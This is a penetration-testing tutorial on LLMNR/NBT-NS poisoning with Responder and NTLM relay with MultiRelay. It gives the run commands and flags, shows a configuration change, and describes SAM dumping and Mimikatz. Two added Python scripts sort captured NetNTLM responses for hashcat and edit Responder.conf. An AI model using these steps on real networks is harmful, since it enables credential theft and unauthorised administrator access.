Responder
An LLMNR and NBT-NS poisoning attack is a classic internal network attack that still works today, because awareness of it is low and both protocols are enabled by default in Windows.
When a Windows host cannot resolve a name through DNS, it falls back to broadcasting LLMNR and NBT-NS queries on the local segment. Responder answers those queries with its own IP address and then serves rogue versions of the requested services (HTTP, HTTPS, WPAD, FTP, SMB and others), so the client authenticates to the attacker's machine and the credentials of every user who tries to authenticate are stolen.
During that authentication the client sends the rogue server a NetNTLMv2 challenge-response (commonly called an NTLMv2 hash) for the user who is authenticating. The response is captured and can be cracked offline with a tool like Hashcat or John the Ripper. Note that a NetNTLMv2 response is not the user's NT hash: it cannot be used in a pass-the-hash attack, but it can be relayed to another host while the session is live (NTLM relay), which is what MultiRelay does.
LLMNR and NBT-NS are enabled by default in Windows, and with awareness of this attack fairly low, you stand a good chance of gathering credentials on an internal penetration test.
Responder - Example
Start Responder with the command below (run it as root, since it binds the poisoned services to privileged ports):
responder -I eth0 -wfF
Flags explanation:
-I = Network interface to listen and poison on.
-w = Start the WPAD rogue proxy server.
-f = Fingerprint the hosts that issued an LLMNR/NBT-NS query (detect Windows and service versions). This flag exists in the older 2.x releases; check responder -h on your version.
-F = Force NTLM/Basic authentication on wpad.dat retrieval. This can pop a login prompt on the victim, so it is the noisiest of the four.
Responder - Example
After Responder is started, all we have to do is wait for a victim.
In our case the victim opened a browser; the browser's WPAD name lookup was poisoned, the rogue WPAD/proxy server demanded authentication, and Responder captured the username and the NetNTLMv2 response.
Captured hashes are written to /usr/share/responder/logs, one file per protocol and client IP, and are also recorded in Responder's SQLite database (Responder.db) so the same user is not logged again on every new request.
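The capture files in that logs directory are the input to the offline cracking step described above. The script below is an added example, not part of the original deck or of the Responder project: it reads Responder-style capture lines, sorts them by hashcat mode (5600 for NetNTLMv2, 5500 for NetNTLMv1), keeps one response per user and mode, and builds the hashcat command line. The sample lines are constructed, the output file names and the rockyou wordlist path are assumptions.

```python
import os
import re
import sys

# Constructed sample in the layout Responder uses for its per-protocol capture
# files (e.g. logs/SMB-NTLMv2-SSP-<client-ip>.txt). All values are synthetic.
# Lines 1-2: the same user seen twice with different server challenges (NetNTLMv2).
# Line 3: an older client that answered with NetNTLMv1. Line 4: a second NetNTLMv2 user.
# Line 5: a console line that does not belong in a hash file, to show rejection.
SAMPLE_CAPTURES = """\
jdoe::CORP:1122334455667788:c5f3a4b3e2d1c0b9a8f7e6d5c4b3a2f1:0101000000000000c0653150de09d201aabbccddeeff001100000000020008004300
jdoe::CORP:8899aabbccddeeff:0f1e2d3c4b5a69788796a5b4c3d2e1f0:0101000000000000c0653150de09d201ffeeddccbbaa998800000000020008004300
svc-backup::CORP:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595:1122334455667788
asmith::CORP:ffeeddccbbaa9988:00112233445566778899aabbccddeeff:0101000000000000c0653150de09d201123456789abcdef000000000020008004300
[SMB] NTLMv2-SSP Client   : 192.168.1.50
"""

# user::domain:serverchallenge(16 hex):NTProofStr(32 hex):blob  -> hashcat -m 5600
NETNTLMV2 = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>[0-9a-fA-F]{16})"
    r":(?P<ntproof>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$")
# user::domain:LMresponse(48 hex):NTresponse(48 hex):serverchallenge(16 hex) -> hashcat -m 5500
NETNTLMV1 = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<lm>[0-9a-fA-F]{48})"
    r":(?P<nt>[0-9a-fA-F]{48}):(?P<challenge>[0-9a-fA-F]{16})$")


def classify(line):
    """Return (hashcat_mode, match) for one capture line, or (None, None)."""
    for pattern, mode in ((NETNTLMV2, "5600"), (NETNTLMV1, "5500")):
        m = pattern.match(line)
        if m:
            return mode, m
    return None, None


def triage(capture_text):
    """Sort capture lines into hashcat modes, keeping one response per DOMAIN\\user per mode.

    Every authentication gets a fresh server challenge, so the same user shows up
    repeatedly with different responses; cracking one of them is enough. A NetNTLMv1
    response is kept even when the same user also gave NetNTLMv2, because v1 is
    far cheaper to crack. Anything that is not a hash line lands in "unparsed".
    """
    out = {"5600": [], "5500": [], "unparsed": []}
    seen = set()
    for raw in capture_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        mode, m = classify(line)
        if mode is None:
            out["unparsed"].append(line)
            continue
        key = (mode, m.group("domain").upper(), m.group("user").lower())
        if key not in seen:
            seen.add(key)
            out[mode].append(line)
    return out


def hashcat_argv(mode, hashfile, wordlist="/usr/share/wordlists/rockyou.txt"):
    """Command line for a straight dictionary attack on one hash file (wordlist path assumed)."""
    return ["hashcat", "-m", mode, "-a", "0", hashfile, wordlist]


def write_hashfiles(triaged, outdir):
    """Write netntlmv2.txt / netntlmv1.txt into outdir; return {mode: path} for non-empty ones."""
    paths = {}
    for mode, name in (("5600", "netntlmv2.txt"), ("5500", "netntlmv1.txt")):
        if triaged[mode]:
            path = os.path.join(outdir, name)
            with open(path, "w") as fh:
                fh.write("\n".join(triaged[mode]) + "\n")
            paths[mode] = path
    return paths


if __name__ == "__main__":
    # Usage: python triage_responder.py /usr/share/responder/logs/*.txt
    # With no arguments the constructed sample above is used.
    if len(sys.argv) > 1:
        text = "".join(open(p).read() for p in sys.argv[1:])
    else:
        text = SAMPLE_CAPTURES
    result = triage(text)
    for mode, path in write_hashfiles(result, ".").items():
        print(f"{len(result[mode])} unique mode-{mode} responses -> {' '.join(hashcat_argv(mode, path))}")
    for line in result["unparsed"]:
        print("skipped:", line)
```

Hashcat's 5600 and 5500 modes accept the lines exactly as Responder writes them, so nothing is reformatted; the script only decides which file each line belongs in and drops the repeats that would otherwise waste cracking time.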
Multi Relay Configuration
To use the MultiRelay function, edit the Responder configuration file:
/etc/responder/Responder.conf
In the [Responder Core] section, switch off the SMB and HTTP servers (SMB = Off, HTTP = Off). Responder must not answer on those ports itself: MultiRelay binds 445 and 80, accepts the victim's NTLM authentication there, and forwards it to the target.
Run Responder with the command below:
responder -I eth0 -wfF
Then run MultiRelay with the command below (location: /usr/share/responder/tools):
python MultiRelay.py -t 192.168.1.141 -u ALL
Flags explanation:
-t = Target host the authentication is relayed to.
-u = User(s) to relay; ALL relays every captured user.
The relay only works against a target that does not require SMB signing (Windows workstations and member servers do not require it by default, domain controllers do), and the relayed user must be a local administrator on the target for MultiRelay to get code execution.
Why use MultiRelay?
• It gives you access to the target without cracking the password hash: the captured authentication is relayed while it is live, so the password never has to be recovered.
• It has built-in post-exploitation commands, including running Mimikatz on the target.
• It can extract the SAM database from the target and print the local account hashes.
• It can upload files to the target and run commands as administrator.
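The configuration change above is the step most often done by hand and most often forgotten, so here it is as an added example (not the deck's or the Responder project's own code): a script that flips SMB and HTTP to Off in the [Responder Core] section of Responder.conf without touching comments or the per-server sections, then reads the result back the way the tool would and reports whether ports 445 and 80 are free for MultiRelay. The embedded configuration is a constructed, abridged copy of the real file's layout; only the keys shown are assumed.

```python
import configparser
import shutil
import sys

# Constructed, abridged Responder.conf in the layout the real file uses:
# a [Responder Core] section listing the servers to start, then per-server
# sections. The real file has many more keys; only these are assumed here.
SAMPLE_CONF = """\
[Responder Core]

; Servers to start
SMB = On
HTTP = On
HTTPS = On
FTP = On
DNS = On

; Custom challenge. "Random" generates a new challenge for each request
Challenge = Random

; SQLite database that records captured hashes
Database = Responder.db

[HTTP Server]

; Set to On to always serve the WPAD script
Serve-Always = Off
"""

CORE = "Responder Core"
RELAY_PORTS_OWNED_BY = ("SMB", "HTTP")   # MultiRelay needs 445 and 80 itself


def disable_servers(conf_text, names=RELAY_PORTS_OWNED_BY):
    """Return (new_text, previous_values) with the named servers set to Off.

    Only keys inside [Responder Core] are rewritten; comments, blank lines and
    every other section are kept as they are, so the file stays valid.
    """
    out, previous, in_core = [], {}, False
    for line in conf_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            in_core = stripped[1:-1].strip().lower() == CORE.lower()
        elif in_core and "=" in stripped and not stripped.startswith((";", "#")):
            key, _, value = stripped.partition("=")
            key = key.strip()
            if key.upper() in names:
                previous[key.upper()] = value.strip()
                line = f"{key} = Off"
        out.append(line)
    return "\n".join(out) + "\n", previous


def servers_on(conf_text):
    """Server names in [Responder Core] whose value is On, parsed as an INI file."""
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    return sorted(k.upper() for k, v in cp[CORE].items() if v.strip().lower() == "on")


def relay_ready(conf_text):
    """True when Responder will leave ports 445 and 80 free for MultiRelay."""
    return not (set(RELAY_PORTS_OWNED_BY) & set(servers_on(conf_text)))


if __name__ == "__main__":
    # Usage: python relay_prep.py [/etc/responder/Responder.conf]
    # Keeps a .bak copy so the SMB/HTTP servers can be switched back on afterwards.
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/responder/Responder.conf"
    with open(path) as fh:
        original = fh.read()
    shutil.copy(path, path + ".bak")
    new_text, previous = disable_servers(original)
    with open(path, "w") as fh:
        fh.write(new_text)
    print("changed:", previous)
    print("still on:", servers_on(new_text))
    print("relay ready:", relay_ready(new_text))
```

Run it before starting Responder and MultiRelay; if relay_ready prints False, Responder would still grab 445 or 80 and MultiRelay would fail to bind. Restore the .bak copy when the relay work is done, otherwise later Responder runs will silently capture nothing over SMB and HTTP.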
Multi Relay - Example
After Responder and MultiRelay are set up, all we have to do is wait for a victim, who must be a local administrator on the target for the relay to give us a shell.
In our case the victim tried to reach a share by a name that did not resolve, Responder poisoned the LLMNR/NBT-NS answer so the SMB connection came to our host, and MultiRelay accepted the authentication and relayed it to the target. We are logged in to the target as that user without ever knowing or cracking the password, and from the MultiRelay shell we can dump the SAM, run Mimikatz, upload files and run commands as that administrator.